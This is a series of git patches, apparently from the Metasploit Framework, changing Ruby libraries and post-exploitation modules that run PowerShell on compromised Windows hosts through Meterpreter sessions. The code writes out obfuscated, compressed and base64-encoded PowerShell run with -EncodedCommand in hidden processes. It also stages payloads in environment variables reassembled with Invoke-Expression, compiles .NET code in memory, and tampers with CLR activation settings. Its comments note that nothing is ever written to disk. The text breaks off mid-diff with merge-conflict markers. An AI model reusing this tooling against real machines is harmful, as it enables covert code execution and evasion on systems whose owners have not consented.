-    		#TODO:
-    		# allow compilation entirely in memory with a b64 encoded product for export without disk access
-    		# Dynamically assign assemblies based on dot_net_code require/includes
-    		# 	Enumerate assemblies available to session, pull requirements, assign accordingly, pass to PS
-
-    		# Critical
-    		dot_net_code = opts[:harness]
-    		if ::File.file?(dot_net_code)
-    			dot_net_code = ::File.read(dot_net_code)
-    			#vprint_good("Read file in #{dot_net_code.encoding.name} encoding")
-    		end
-    		return if dot_net_code.nil? or dot_net_code.empty?
-
-    		# Ensure we're not running ASCII-8bit through powershell
-    		dot_net_code = dot_net_code.force_encoding('ASCII')
-
-    		# Optional
-    		provider = opts[:provider] || 'Microsoft.CSharp.CSharpCodeProvider' # This should also work with 'Microsoft.VisualBasic.VBCodeProvider'
-    		target = opts[:target] # Unless building assemblies in memory only
-    		certificate = opts[:cert] # PFX certificate path
-    		payload = opts[:payload]
-
-    		assemblies = ["mscorlib.dll", "System.dll", "System.Xml.dll", "System.Data.dll", "System.Net.dll"]
-    		if opts[:assemblies]
-    			opts[:assemblies] = opts[:assemblies].split(',').map {|a| agsub(/\s+/,'')} unless opts[:assemblies].is_a?(Array)
-    			assemblies += opts[:assemblies]
-    		end
-    		# 	# Read our code, attempt to find required assemblies
-    		# 	inc_var = provider == 'Microsoft.VisualBasic.VBCodeProvider' ? 'imports' : 'using'
-    		# 	assemblies =+ dot_net_code.split("\n").keep_if {|line| line =~ /^#{inc_var}.*;/i }.map do |dep|
-    		# 		dep[dep.index(/\s/)+1..-2] + '.dll'
-    		# 	end
-    		# end
-    		assemblies = assemblies.uniq.compact
-
-    		compiler_opts = opts[:com_opts] || '/platform:x86 /optimize'
-
-
-    		if payload
-    			dot_net_code = dot_net_code.gsub('MSF_PAYLOAD_SPACE', payload)
-    		end
-
-    		var_gen_exe = target ? '$true' : '$false'
-
-    		# Obfu
-    		var_func = Rex::Text.rand_text_alpha(rand(8)+8)
-    		var_code = Rex::Text.rand_text_alpha(rand(8)+8)
-    		var_refs = Rex::Text.rand_text_alpha(rand(8)+8)
-    		var_provider = Rex::Text.rand_text_alpha(rand(8)+8)
-    		var_params = Rex::Text.rand_text_alpha(rand(8)+8)
-    		var_output = Rex::Text.rand_text_alpha(rand(8)+8)
-    		var_cert = Rex::Text.rand_text_alpha(rand(8)+8)
-
-    		compiler = <<EOS
-function #{var_func} {
-param (
-[string[]] $#{var_code}
-, [string[]] $references = @()
-)
-$#{var_provider} = New-Object #{provider}
-$#{var_params} = New-Object System.CodeDom.Compiler.CompilerParameters
-@( "#{assemblies.join('", "')}", ([System.Reflection.Assembly]::GetAssembly( [PSObject] ).Location) ) | Sort -unique |% { $#{var_params}.ReferencedAssemblies.Add( $_ ) } | Out-Null
-$#{var_params}.GenerateExecutable = #{var_gen_exe}
-$#{var_params}.OutputAssembly = "#{target}"
-$#{var_params}.GenerateInMemory   = $true
-$#{var_params}.CompilerOptions = "#{compiler_opts}"
-# $#{var_params}.IncludeDebugInformation = $true
-$#{var_output} = $#{var_provider}.CompileAssemblyFromSource( $#{var_params}, $#{var_code} )
-if ( $#{var_output}.Errors.Count -gt 0 ) {
-$#{var_output}.Errors |% { Write-Error $_.ToString() }
-} else { return $#{var_output}.CompiledAssembly}
-}
-#{var_func} -#{var_code} @'
-
-#{dot_net_code}
-
-'@
-
-EOS
-
-    		if certificate and target
-    			compiler << <<EOS
-#{var_cert} = Get-PfxCertificate #{certificate}
-Set-AuthenticodeSignature -Filepath #{target} -Cert #{var_cert}
-
-
-EOS
-
-
-    		end
-    		# PS uses .NET 2.0 by default which doesnt work @ present (20120814, RLTM)
-    		# x86 targets also need to be compiled in x86 powershell instance
-    		run_32 = compiler_opts =~ /platform:x86/i ? true : false
-    		if opts[:net_clr] and opts[:net_clr] > 2 # PS before 3.0 natively uses NET 2
-    			return elevate_net_clr(compiler, run_32, opts[:net_clr])
-    		else
-    			return compiler
-    		end
-
-    	end
-
-    	def elevate_net_clr(ps_code, run_32 = false, net_ver = '4.0')
-    		var_func = Rex::Text.rand_text_alpha(rand(8)+8)
-    		var_conf_path = Rex::Text.rand_text_alpha(rand(8)+8)
-    		var_env_name = Rex::Text.rand_text_alpha(rand(8)+8)
-    		var_env_old = Rex::Text.rand_text_alpha(rand(8)+8)
-    		var_run32 = Rex::Text.rand_text_alpha(rand(8)+8)
-
-    		exec_wrapper = <<EOS
-function #{var_func} {
-[CmdletBinding()]
-param (
-[Parameter(Mandatory=$true)]
-[ScriptBlock]
-$ScriptBlock
-)
-$#{var_run32} = $#{run_32.to_s}
-if ($PSVersionTable.CLRVersion.Major -eq #{net_ver.to_i}) {
-Invoke-Command -ScriptBlock $ScriptBlock -ArgumentList $ArgumentList
-return
-}
-$#{var_conf_path} = $Env:TEMP | Join-Path -ChildPath ([Guid]::NewGuid())
-New-Item -Path $#{var_conf_path} -ItemType Container | Out-Null
-@"
-<?xml version="1.0" encoding="utf-8" ?>
-<configuration>
-<startup useLegacyV2RuntimeActivationPolicy="true">
-<supportedRuntime version="v#{net_ver.to_f}"/>
-<supportedRuntime version="v2.0.50727"/>
-</startup>
-</configuration>
-"@ | Set-Content -Path $#{var_conf_path}/powershell.exe.activation_config -Encoding UTF8
-$#{var_env_name} = 'COMPLUS_ApplicationMigrationRuntimeActivationConfigPath'
-$#{var_env_old} = [Environment]::GetEnvironmentVariable($#{var_env_name})
-[Environment]::SetEnvironmentVariable($#{var_env_name}, $#{var_conf_path})
-try { if ($#{var_run32} -and [IntPtr]::size -eq 8 ) {
-&"$env:windir\\syswow64\\windowspowershell\\v1.0\\powershell.exe" -inputformat text -command $ScriptBlock -noninteractive
-} else {
-&"$env:windir\\system32\\windowspowershell\\v1.0\\powershell.exe" -inputformat text -command $ScriptBlock -noninteractive
-}} finally {
-[Environment]::SetEnvironmentVariable($#{var_env_name}, $#{var_env_old})
-$#{var_conf_path} | Remove-Item -Recurse
-}
-}
-#{var_func} -ScriptBlock {
-#{ps_code}
-}
-
-
-EOS
-
-    	end
-
-    end
-  end
-end
diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb
deleted file mode 100644
index b02b4bd552..0000000000
--- a/lib/msf/core/post/windows/powershell.rb
+++ /dev/null
@@ -1,292 +0,0 @@
-# -*- coding: binary -*-
-require 'msf/core/exploit/powershell'
-require 'msf/core/post/common'
-
-module Msf
-class Post
-module Windows
-
-module Powershell
-	include ::Msf::Exploit::Powershell
-	include ::Msf::Post::Common
-
-	def initialize(info = {})
-		super
-		register_advanced_options(
-			[
-				OptInt.new('PSH::timeout',   [true, 'Powershell execution timeout, set < 0 to run async without termination', 15]),
-				OptBool.new('PSH::log_output', [true, 'Write output to log file', false]),
-				OptBool.new('PSH::dry_run', [true, 'Write output to log file', false]),
-			], self.class)
-	end
-
-	#
-	# Returns true if powershell is installed
-	#
-	def have_powershell?
-		cmd_out = cmd_exec("powershell get-host")
-		return true if cmd_out =~ /Name.*Version.*InstanceID/
-		return false
-	end
-
-	#
-	# Get/compare list of current PS processes - nested execution can spawn many children
-	# doing checks before and after execution allows us to kill more children...
-	# This is a hack, better solutions are welcome since this could kill user
-	# spawned powershell windows created between comparisons.
-	#
-	def get_ps_pids(pids = [])
-		current_pids = session.sys.process.get_processes.keep_if {|p|
-			p['name'].downcase == 'powershell.exe'
-		}.map {|p| p['pid']}
-		# Subtract previously known pids
-		current_pids = (current_pids - pids).uniq
-		return current_pids
-	end
-
-	#
-	# Execute a powershell script and return the output, channels, and pids. The script
-	# is never written to disk.
-	#
-	def execute_script(script, greedy_kill = false)
-		@session_pids ||= []
-		running_pids = greedy_kill ? get_ps_pids : []
-		open_channels = []
-		# Execute using -EncodedCommand
-		session.response_timeout = datastore['PSH::timeout'].to_i
-		ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
-		ps_string = "#{ps_bin} -EncodedCommand #{script} -InputFormat None"
-		# vprint_good("EXECUTING:\n#{ps_string}")
-		cmd_out = session.sys.process.execute(ps_string, nil, {'Hidden' => true, 'Channelized' => true})
-
-		# Subtract prior PIDs from current
-		if greedy_kill
-			Rex::ThreadSafe.sleep(3) # Let PS start child procs
-			running_pids = get_ps_pids(running_pids)
-		end
-
-		# Add to list of running processes
-		running_pids << cmd_out.pid
-
-		# All pids start here, so store them in a class variable
-		(@session_pids += running_pids).uniq!
-
-		# Add to list of open channels
-		open_channels << cmd_out
-
-		return [cmd_out, running_pids.uniq, open_channels]
-	end
-
-
-	#
-	# Powershell scripts that are longer than 8000 bytes are split into 8000
-	# 8000 byte chunks and stored as environment variables. A new powershell
-	# script is built that will reassemble the chunks and execute the script.
-	# Returns the reassembly script.
-	#
-	def stage_to_env(compressed_script, env_suffix = Rex::Text.rand_text_alpha(8))
-
-		# Check to ensure script is encoded and compressed
-		if compressed_script =~ /\s|\.|\;/
-			compressed_script = compress_script(compressed_script)
-		end
-		# Divide the encoded script into 8000 byte chunks and iterate
-		index = 0
-		count = 8000
-		while (index < compressed_script.size - 1)
-			# Define random, but serialized variable name
-			env_prefix = "%05d" % ((index + 8000)/8000)
-			env_variable = env_prefix + env_suffix
-
-			# Create chunk
-			chunk = compressed_script[index, count]
-
-			# Build the set commands
-			set_env_variable =  "[Environment]::SetEnvironmentVariable("
-			set_env_variable += "'#{env_variable}',"
-			set_env_variable += "'#{chunk}', 'User')"
-
-			# Compress and encode the set command
-			encoded_stager = compress_script(set_env_variable)
-
-			# Stage the payload
-			print_good(" - Bytes remaining: #{compressed_script.size - index}")
-			cmd_out, running_pids, open_channels = execute_script(encoded_stager, false)
-			# Increment index
-			index += count
-
-		end
-
-		# Build the script reassembler
-		reassemble_command =  "[Environment]::GetEnvironmentVariables('User').keys|"
-		reassemble_command += "Select-String #{env_suffix}|Sort-Object|%{"
-		reassemble_command += "$c+=[Environment]::GetEnvironmentVariable($_,'User')"
-		reassemble_command += "};Invoke-Expression $($([Text.Encoding]::Unicode."
-		reassemble_command += "GetString($([Convert]::FromBase64String($c)))))"
-
-		# Compress and encode the reassemble command
-		encoded_script = compress_script(reassemble_command)
-
-		return encoded_script
-	end
-
-	#
-	# Reads output of the command channel and empties the buffer.
-	# Will optionally log command output to disk.
-	#
-	def get_ps_output(cmd_out, eof, read_wait = 5)
-		results = ''
-
-		if datastore['PSH::log_output']
-			# Get target's computer name
-			computer_name = session.sys.config.sysinfo['Computer']
-
-			# Create unique log directory
-			log_dir = ::File.join(Msf::Config.log_directory,'scripts','powershell', computer_name)
-			::FileUtils.mkdir_p(log_dir)
-
-			# Define log filename
-			time_stamp  = ::Time.now.strftime('%Y%m%d:%H%M%S')
-			log_file    = ::File.join(log_dir,"#{time_stamp}.txt")
-
-
-			# Open log file for writing
-			fd = ::File.new(log_file, 'w+')
-		end
-
-		# Read output until eof or nil return output and write to log
-		while (1)
-			line = ::Timeout.timeout(read_wait) {
-				cmd_out.channel.read
-			} rescue nil
-			break if line.nil?
-			if (line.sub!(/#{eof}/, ''))
-				results << line
-				fd.write(line) if fd
-				#vprint_good("\t#{line}")
-				break
-			end
-			results << line
-			fd.write(line) if fd
-			#vprint_status("\n#{line}")
-		end
-
-		# Close log file
-		# cmd_out.channel.close()
-		fd.close() if fd
-
-		return results
-
-		#
-		# Incremental read method - NOT USED
-		#
-		# read_data = ''
-		# 	segment = 2**16
-		# 	# Read incrementally smaller blocks after each failure/timeout
-		# 	while segment > 0 do
-		# 		begin
-		# 			read_data << ::Timeout.timeout(read_wait) {
-		# 				cmd_out.channel.read(segment)
-		# 			}
-		# 		rescue
-		# 			segment = segment/2
-		# 		end
-		# 	end
-	end
-
-	#
-	# Clean up powershell script including process and chunks stored in environment variables
-	#
-	def clean_up(
-		script_file = nil,
-		eof = '',
-		running_pids =[],
-		open_channels = [],
-		env_suffix = Rex::Text.rand_text_alpha(8),
-		delete = false
-	)
-		# Remove environment variables
-		env_del_command =  "[Environment]::GetEnvironmentVariables('User').keys|"
-		env_del_command += "Select-String #{env_suffix}|%{"
-		env_del_command += "[Environment]::SetEnvironmentVariable($_,$null,'User')}"
-
-		script = compress_script(env_del_command, eof)
-		cmd_out, new_running_pids, new_open_channels = execute_script(script)
-		get_ps_output(cmd_out, eof)
-
-		# Kill running processes, should mutex this...
-		@session_pids = (@session_pids + running_pids + new_running_pids).uniq
-		(running_pids + new_running_pids).uniq.each do |pid|
-			begin
-				session.sys.process.kill(pid)
-				@session_pids.delete(pid)
-			rescue Rex::Post::Meterpreter::RequestError => e
-				print_error "Failed to kill #{pid} due to #{e}"
-			end
-		end
-
-
-		# Close open channels
-		(open_channels + new_open_channels).uniq.each do |chan|
-			chan.channel.close
-		end
-
-		::File.delete(script_file) if (script_file and delete)
-
-		return
-	end
-
-	#
-	# Simple script execution wrapper, performs all steps
-	# required to execute a string of powershell.
-	# This method will try to kill all powershell.exe PIDs
-	# which appeared during its execution, set greedy_kill
-	# to false if this is not desired.
-	#
-	def psh_exec(script, greedy_kill=true, ps_cleanup=true)
-		# Define vars
-		eof = Rex::Text.rand_text_alpha(8)
-		# eof = "THIS__SCRIPT_HAS__COMPLETED_EXECUTION#{rand(100)}"
-		env_suffix = Rex::Text.rand_text_alpha(8)
-		script = PshScript.new(script) unless script.respond_to?(:compress_code)
-		# Check format
-		if script =~ /\s|\.|\;/
-			script = compress_script(script, eof)
-		end
-		if datastore['PSH::dry_run']
-			return "powershell -EncodedCommand #{script}"
-		else
-			# Check 8k cmd buffer limit, stage if needed
-			if (script.size > 8100)
-				vprint_error("Compressed size: #{script.size}")
-				error_msg =  "Compressed size may cause command to exceed "
-				error_msg += "cmd.exe's 8kB character limit."
-				vprint_error(error_msg)
-				vprint_good('Launching stager:')
-				script = stage_to_env(script, env_suffix)
-				print_good("Payload successfully staged.")
-			else
-				print_good("Compressed size: #{script.size}")
-			end
-			# Execute the script, get the output, and kill the resulting PIDs
-			cmd_out, running_pids, open_channels = execute_script(script, greedy_kill)
-			if datastore['PSH::timeout'].to_i < 0
-				out =  'Started async execution, output collection and cleanup will not be performed'
-				print_error out
-				return out
-			end
-			ps_output = get_ps_output(cmd_out,eof,datastore['PSH::timeout'])
-			# Kill off the resulting processes if needed
-			if ps_cleanup
-				vprint_good( "Cleaning up #{running_pids.join(', ')}" )
-				clean_up(nil, eof, running_pids, open_channels, env_suffix, false)
-			end
-			return ps_output
-		end
-	end
-
-end
-end
-end
-end
-
diff --git a/modules/post/windows/manage/powershell/exec_cmd.rb b/modules/post/windows/manage/powershell/exec_cmd.rb
deleted file mode 100644
index 08a491e160..0000000000
--- a/modules/post/windows/manage/powershell/exec_cmd.rb
+++ /dev/null
@@ -1,77 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
-##
-
-##
-# Original script comments by nick[at]executionflow.org:
-# Meterpreter script to deliver and execute powershell scripts using
-# a compression/encoding method based on the powershell PoC code
-# from rel1k and winfang98 at DEF CON 18. This script furthers the
-# idea by bypassing Windows' command character lmits, allowing the
-# execution of very large scripts. No files are ever written to disk.
-##
-require 'msf/core'
-require 'rex'
-require 'msf/core/post/windows/powershell'
-
-class Metasploit3 < Msf::Post
-	include Msf::Post::Windows::Powershell
-
-	def initialize(info={})
-		super(update_info(info,
-			'Name'                 => "Powershell: Execute Command",
-			'Description'          => %q{
-				This module will execute a string of Powershell and return output.
-			},
-			'License'              => MSF_LICENSE,
-			'Platform'             => ['win'],
-			'SessionTypes'         => ['meterpreter'],
-			'Author'               => [
-				'Nicholas Nam (nick[at]executionflow.org)', # original meterpreter script
-				'RageLtMan' # post module
-				]
-		))
-
-		register_options(
-			[
-				OptString.new( 'PSH_CMD',  [true, 'Powershell string to execute', "echo 'metasploited'"]),
-			], self.class)
-
-		register_advanced_options(
-			[
-				OptString.new('SUBSTITUTIONS', [false, 'Script subs in gsub format - original,sub;original,sub' ]),
-			], self.class)
-
-	end
-
-	def run
-
-		# Make sure we meet the requirements before running the script, note no need to return
-		# unless error
-		return 0 if ! (session.type == "meterpreter" || have_powershell?)
-
-		# check/set vars
-		subs = process_subs(datastore['SUBSTITUTIONS'])
-		script_in = read_script(datastore['PSH_CMD'])
-
-		# Make substitutions in script if needed
-		script_in = make_subs(script_in, subs) unless subs.empty?
- 		print_status(script_in)
-		print_status(script_in.dup.compress_code)
-
-		# Execute the powershell script
-		print_status('Executing the script.')
-
-		ps_output = psh_exec(script_in)
-
-		print_status ps_output
-
-		# That's it
-		print_good('Finished!')
-	end
-
-end
-
diff --git a/modules/post/windows/manage/powershell/exec_script.rb b/modules/post/windows/manage/powershell/exec_script.rb
deleted file mode 100644
index ecbab8a9fc..0000000000
--- a/modules/post/windows/manage/powershell/exec_script.rb
+++ /dev/null
@@ -1,90 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
-##
-
-##
-# Original script comments by nick[at]executionflow.org:
-# Meterpreter script to deliver and execute powershell scripts using
-# a compression/encoding method based on the powershell PoC code
-# from rel1k and winfang98 at DEF CON 18. This script furthers the
-# idea by bypassing Windows' command character lmits, allowing the
-# execution of very large scripts. No files are ever written to disk.
-##
-
-##
-# Since the original port to Metasploit, the implementation has grown
-# to include partial PSH syntax parsing, gzip compression, rex, msf,
-# and post modules providing various layers of functionality and
-# convenience methods.
-##
-
-require 'msf/core'
-require 'rex'
-require 'msf/core/post/windows/powershell'
-
-class Metasploit3 < Msf::Post
-	include Msf::Post::Windows::Powershell
-
-	def initialize(info={})
-		super(update_info(info,
-      'Name'                 => "Powershell: Execute Command",
-      'Description'          => %q{
-        This module will execute a Powershell script and return output
-			},
-			'License'              => MSF_LICENSE,
-			'Platform'             => ['win'],
-			'SessionTypes'         => ['meterpreter'],
-			'Author'               => [
-				'Nicholas Nam (nick[at]executionflow.org)', # original meterpreter script
-				'RageLtMan' # post module
-				]
-		))
-
-		register_options(
-			[
-				OptPath.new( 'SCRIPT',  [true, 'Path to the PS script', ::File.join(Msf::Config.install_root, "scripts", "ps", "msflag.ps1") ]),
-				OptString.new( 'PSH_CMD', [false, 'Powershell to execute after the script']),
-			], self.class)
-
-		register_advanced_options(
-			[
-				OptString.new('SUBSTITUTIONS', [false, 'Script subs in gsub format - original,sub;original,sub' ]),
-				OptBool.new(  'DELETE',        [false, 'Delete file after execution', false ]),
-			], self.class)
-
-	end
-
-	def run
-
-		# Make sure we meet the requirements before running the script, note no need to return
-		# unless error
-		return 0 if ! (session.type == "meterpreter" || have_powershell?)
-
-		# check/set vars
-		subs = process_subs(datastore['SUBSTITUTIONS'])
-		script_in = read_script(datastore['SCRIPT'])
-		if datastore['PSH_CMD']
-			script_in = read_script(script_in + "\n#{datastore['PSH_CMD']}")
-		end
-		
-
-		# Make substitutions in script if needed
-		script_in = make_subs(script_in, subs) unless subs.empty?
-		vprint_status(script_in)
-
-		# Execute the powershell script
-		print_status('Executing the script.')
-
-		ps_output = psh_exec(script_in)
-
-		print_good ps_output
-
-		# That's it
-		print_good('Finished!')
-	end
-
-end
-

From 9d93891395a8a52d16b5637fe1fe575b4c396d80 Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Sat, 20 Jul 2013 19:32:38 -0400
Subject: [PATCH 005/321] Import old powershell post lib from master

This is temporary and rather messy. Since the internals for
dealing with PSH code have moved to Rex there may be a hiccup or
two here. This was my original attempt at basic PSH integration
and does not make use of the new libraries and namespaces in
this PR.

Will introduce the updated modules and libraries in separate PR.
---
 lib/msf/core/post/windows/powershell.rb | 243 ++++++++++++++++++++++++
 1 file changed, 243 insertions(+)
 create mode 100644 lib/msf/core/post/windows/powershell.rb

diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb
new file mode 100644
index 0000000000..405b35e8f6
--- /dev/null
+++ b/lib/msf/core/post/windows/powershell.rb
@@ -0,0 +1,243 @@
+# -*- coding: binary -*-
+require 'zlib'
+require 'msf/core/post/common'
+
+module Msf
+class Post
+module Windows
+
+module Powershell
+	include ::Msf::Post::Common
+
+
+	# List of running processes, open channels, and env variables...
+
+
+	# Suffix for environment variables
+
+	#
+	# Returns true if powershell is installed
+	#
+	def have_powershell?
+		cmd_out = cmd_exec("powershell get-host")
+		return true if cmd_out =~ /Name.*Version.*InstanceID/
+		return false
+	end
+
+	#
+	# Insert substitutions into the powershell script
+	#
+	def make_subs(script, subs)
+		subs.each do |set|
+			script.gsub!(set[0],set[1])
+		end
+		if datastore['VERBOSE']
+			print_good("Final Script: ")
+			script.each_line {|l| print_status("\t#{l}")}
+		end
+	end
+
+	#
+	# Return an array of substitutions for use in make_subs
+	#
+	def process_subs(subs)
+		return [] if subs.nil? or subs.empty?
+		new_subs = []
+		subs.split(';').each do |set|
+			new_subs << set.split(',', 2)
+		end
+		return new_subs
+	end
+
+	#
+	# Read in a powershell script stored in +script+
+	#
+	def read_script(script)
+		script_in = ''
+		begin
+			# Open script file for reading
+			fd = ::File.new(script, 'r')
+			while (line = fd.gets)
+				script_in << line
+			end
+
+			# Close open file
+			fd.close()
+		rescue Errno::ENAMETOOLONG, Errno::ENOENT
+			# Treat script as a... script
+			script_in = script
+		end
+		return script_in
+	end
+
+
+	#
+	# Return a zlib compressed powershell script
+	#
+	def compress_script(script_in, eof = nil)
+
+		# Compress using the Deflate algorithm
+		compressed_stream = ::Zlib::Deflate.deflate(script_in,
+			::Zlib::BEST_COMPRESSION)
+
+		# Base64 encode the compressed file contents
+		encoded_stream = Rex::Text.encode_base64(compressed_stream)
+
+		# Build the powershell expression
+		# Decode base64 encoded command and create a stream object
+		psh_expression =  "$stream = New-Object IO.MemoryStream(,"
+		psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
+		# Read & delete the first two bytes due to incompatibility with MS
+		psh_expression += "$stream.ReadByte()|Out-Null;"
+		psh_expression += "$stream.ReadByte()|Out-Null;"
+		# Uncompress and invoke the expression (execute)
+		psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
+		psh_expression += "$(New-Object IO.Compression.DeflateStream("
+		psh_expression += "$stream,"
+		psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
+		psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
+
+		# If eof is set, add a marker to signify end of script output
+		if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+
+		# Convert expression to unicode
+		unicode_expression = Rex::Text.to_unicode(psh_expression)
+
+		# Base64 encode the unicode expression
+		encoded_expression = Rex::Text.encode_base64(unicode_expression)
+
+		return encoded_expression
+	end
+
+	#
+	# Execute a powershell script and return the results. The script is never written
+	# to disk.
+	#
+	def execute_script(script, time_out = 15)
+		running_pids, open_channels = [], []
+		# Execute using -EncodedCommand
+		session.response_timeout = time_out
+		cmd_out = session.sys.process.execute("powershell -EncodedCommand " +
+			"#{script}", nil, {'Hidden' => true, 'Channelized' => true})
+
+		# Add to list of running processes
+		running_pids << cmd_out.pid
+
+		# Add to list of open channels
+		open_channels << cmd_out
+
+		return [cmd_out, running_pids, open_channels]
+	end
+
+
+	#
+	# Powershell scripts that are longer than 8000 bytes are split into 8000
+	# 8000 byte chunks and stored as environment variables. A new powershell
+	# script is built that will reassemble the chunks and execute the script.
+	# Returns the reassembly script.
+	#
+	def stage_to_env(compressed_script, env_suffix = Rex::Text.rand_text_alpha(8))
+
+		# Check to ensure script is encoded and compressed
+		if compressed_script =~ /\s|\.|\;/
+			compressed_script = compress_script(compressed_script)
+		end
+		# Divide the encoded script into 8000 byte chunks and iterate
+		index = 0
+		count = 8000
+		while (index < compressed_script.size - 1)
+			# Define random, but serialized variable name
+			env_prefix = "%05d" % ((index + 8000)/8000)
+			env_variable = env_prefix + env_suffix
+
+			# Create chunk
+			chunk = compressed_script[index, count]
+
+			# Build the set commands
+			set_env_variable =  "[Environment]::SetEnvironmentVariable("
+			set_env_variable += "'#{env_variable}',"
+			set_env_variable += "'#{chunk}', 'User')"
+
+			# Compress and encode the set command
+			encoded_stager = compress_script(set_env_variable)
+
+			# Stage the payload
+			print_good(" - Bytes remaining: #{compressed_script.size - index}")
+			execute_script(encoded_stager)
+
+			# Increment index
+			index += count
+
+		end
+
+		# Build the script reassembler
+		reassemble_command =  "[Environment]::GetEnvironmentVariables('User').keys|"
+		reassemble_command += "Select-String #{env_suffix}|Sort-Object|%{"
+		reassemble_command += "$c+=[Environment]::GetEnvironmentVariable($_,'User')"
+		reassemble_command += "};Invoke-Expression $($([Text.Encoding]::Unicode."
+		reassemble_command += "GetString($([Convert]::FromBase64String($c)))))"
+
+		# Compress and encode the reassemble command
+		encoded_script = compress_script(reassemble_command)
+
+		return encoded_script
+	end
+
+	#
+	# Log the results of the powershell script
+	#
+	def write_to_log(cmd_out, log_file, eof)
+		# Open log file for writing
+		fd = ::File.new(log_file, 'w+')
+
+		# Read output until eof and write to log
+		while (line = cmd_out.channel.read())
+			if (line.sub!(/#{eof}/, ''))
+				fd.write(line)
+				vprint_good("\t#{line}")
+				cmd_out.channel.close()
+				break
+			end
+			fd.write(line)
+			vprint_good("\t#{line}")
+		end
+
+		# Close log file
+		fd.close()
+
+		return
+	end
+
+	#
+	# Clean up powershell script including process and chunks stored in environment variables
+	#
+	def clean_up(script_file = nil, eof = '', running_pids =[], open_channels = [], env_suffix = Rex::Text.rand_text_alpha(8), delete = false)
+		# Remove environment variables
+		env_del_command =  "[Environment]::GetEnvironmentVariables('User').keys|"
+		env_del_command += "Select-String #{env_suffix}|%{"
+		env_del_command += "[Environment]::SetEnvironmentVariable($_,$null,'User')}"
+		script = compress_script(env_del_command, eof)
+		cmd_out, running_pids, open_channels = *execute_script(script)
+		write_to_log(cmd_out, "/dev/null", eof)
+
+		# Kill running processes
+		running_pids.each() do |pid|
+			session.sys.process.kill(pid)
+		end
+
+
+		# Close open channels
+		open_channels.each() do |chan|
+			chan.channel.close()
+		end
+
+		::File.delete(script_file) if (script_file and delete)
+
+		return
+	end
+
+end
+end
+end
+end
+

From 4df3b0215c6d69fcd8d87238a41edbb20777544a Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Sat, 20 Jul 2013 19:55:01 -0400
Subject: [PATCH 006/321] replace lib/msf/core/exploit/powershell.rb, thanks
 @Meatballs1

---
 lib/msf/core/exploit/powershell.rb | 427 ++++++++++-------------------
 1 file changed, 150 insertions(+), 277 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 909d32ba9a..5539f5c8f4 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -1,175 +1,87 @@
 # -*- coding: binary -*-
-<<<<<<< HEAD
 require 'rex/exploitation/powershell'
-=======
-require 'zlib'
->>>>>>> master
 
 module Msf
 module Exploit::Powershell
 
-<<<<<<< HEAD
-	class PshScript < Rex::Exploitation::Powershell::Script
-	end
+  class PshScript < Rex::Exploitation::Powershell::Script
+  end
 
-	def initialize(info = {})
-		super
-		register_advanced_options(
-			[
-				OptBool.new('RUN_WOW64', [
-					false,
-					'Execute powershell in 32bit compatibility mode, payloads need native arch',
-					false
-						]),
-				OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
-				OptBool.new('PSH::strip_whitespace', [false, 'Strip whitespace', false]),
-				OptBool.new('PSH::sub_vars', [false, 'Substitute variable names', false]),
-				OptBool.new('PSH::sub_funcs', [false, 'Substitute function names', false]),
-=======
-	def initialize(info = {})
-		super
-		register_options(
-		[
-				OptBool.new('PERSIST', [true, 'Run the payload in a loop', false]),
-				OptBool.new('PSH_OLD_METHOD', [true, 'Use powershell 1.0', false]),
-				OptBool.new('RUN_WOW64', [
-					true,
-					'Execute powershell in 32bit compatibility mode, payloads need native arch',
-					false
-						]),
->>>>>>> master
-			], self.class)
-	end
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        OptBool.new('RUN_WOW64', [
+          false,
+          'Execute powershell in 32bit compatibility mode, payloads need native arch',
+          false
+            ]),
+        OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
+        OptBool.new('PSH::strip_whitespace', [false, 'Strip whitespace', false]),
+        OptBool.new('PSH::sub_vars', [false, 'Substitute variable names', false]),
+        OptBool.new('PSH::sub_funcs', [false, 'Substitute function names', false]),
+      ], self.class)
+  end
 
-	#
-<<<<<<< HEAD
-	# Reads script into a PshScript
-	#
-	def read_script(script)
-		return PshScript.new(script)
-	end
+  #
+  # Reads script into a PshScript
+  #
+  def read_script(script)
+    return PshScript.new(script)
+  end
 
-	#
-=======
->>>>>>> master
-	# Insert substitutions into the powershell script
-	#
-	def make_subs(script, subs)
-		if ::File.file?(script)
-			script = ::File.read(script)
-		end
+  #
+  # Insert substitutions into the powershell script
+  #
+  def make_subs(script, subs)
+    if ::File.file?(script)
+      script = ::File.read(script)
+    end
 
-		subs.each do |set|
-			script.gsub!(set[0],set[1])
-		end
-<<<<<<< HEAD
-		# if datastore['VERBOSE']
-		#   print_good("Final Script: ")
-		#   script.each_line {|l| print_status("\t#{l}")}
-		# end
-=======
-		if datastore['VERBOSE']
-			print_good("Final Script: ")
-			script.each_line {|l| print_status("\t#{l}")}
-		end
->>>>>>> master
-		return script
-	end
+    subs.each do |set|
+      script.gsub!(set[0],set[1])
+    end
+    # if datastore['VERBOSE']
+    #   print_good("Final Script: ")
+    #   script.each_line {|l| print_status("\t#{l}")}
+    # end
+    return script
+  end
 
-	#
-	# Return an array of substitutions for use in make_subs
-	#
-	def process_subs(subs)
-		return [] if subs.nil? or subs.empty?
-		new_subs = []
